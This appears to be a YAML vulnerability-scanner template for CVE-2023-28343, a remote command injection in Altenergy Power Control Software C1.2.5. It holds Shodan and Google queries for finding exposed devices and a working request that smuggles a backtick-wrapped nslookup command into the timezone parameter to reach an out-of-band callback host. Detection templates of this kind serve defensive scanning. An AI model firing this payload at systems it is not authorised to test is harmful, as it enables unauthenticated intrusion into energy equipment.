id: CVE-2023-28343

info:
  name: Altenergy Power Control Software C1.2.5 - Remote Command Injection
  author: pikpikcu
  severity: critical
  verified: true
  description: |
    Altenergy Power Control Software C1.2.5 is susceptible to remote command injection via shell metacharacters in the index.php/management/set_timezone parameter, because of set_timezone in models/management_model.php. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized operations without entering necessary credentials.
    google-query: intitle:"Altenergy Power Control Software"
    shodan-query: title:"Altenergy Power Control Software"
  reference:
    - https://github.com/ahmedalroky/Disclosures/blob/main/apesystems/os_command_injection.md
    - https://apsystems.com
    - http://packetstormsecurity.com/files/171775/Altenergy-Power-Control-Software-C1.2.5-Command-Injection.html
    - https://nvd.nist.gov/vuln/detail/CVE-2023-28343
  tags: cve,cve2023,oast,altenergy,iot,packetstorm
  created: 2023/06/07

set:
  baseurl: request.url
  reverse: newReverse()
  reverseURL: reverse.url.host
rules:
  r0:
    request:
      method: POST
      path: /index.php/management/set_timezone
      headers:
        Referer: "{{baseurl}}/index.php/management/datetime"
      body: timezone=`nslookup {{reverseURL}}`
    expression: |
      response.status == 200 &&
      response.body.bcontains(b'Time Zone updated successfully') &&
      reverse.wait(5)
expression: r0()